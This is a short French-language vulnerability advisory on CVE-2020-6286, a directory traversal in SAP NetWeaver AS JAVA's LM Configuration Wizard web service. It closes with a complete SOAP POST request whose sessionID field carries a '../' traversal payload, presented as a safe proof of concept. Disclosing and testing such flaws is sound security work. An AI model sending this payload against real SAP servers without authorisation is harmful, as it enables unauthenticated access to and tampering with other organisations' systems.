
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Directory Traversal
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) - Traversée de répertoire
SAP NetWeaver est la plateforme technologique intégrée de SAP et le fondement technique de toutes les applications SAP depuis SAP Business Suite. SAP NetWeaver est une plateforme applicative et d'intégration orientée services qui fournit un environnement de développement et d'exécution pour les applications SAP, et peut également être utilisé pour des développements personnalisés et l'intégration avec d'autres applications et systèmes. La validation insuffisante du chemin d'entrée d'un certain paramètre dans le service web de SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, permet à un attaquant non authentifié d'exploiter une méthode pour télécharger des fichiers zip vers un répertoire spécifique, conduisant à une traversée de répertoire.
Pour une preuve de concept sécurisée, vous pouvez utiliser la requête suivante. Si le fichier zip existe sur l'hôte distant, il télécharge le fichier 111.zip
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header />
<soapenv:Body>
<urn:queryProtocol>
<sessionID>/../../../../../../../../../../../../../../../../../..111</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>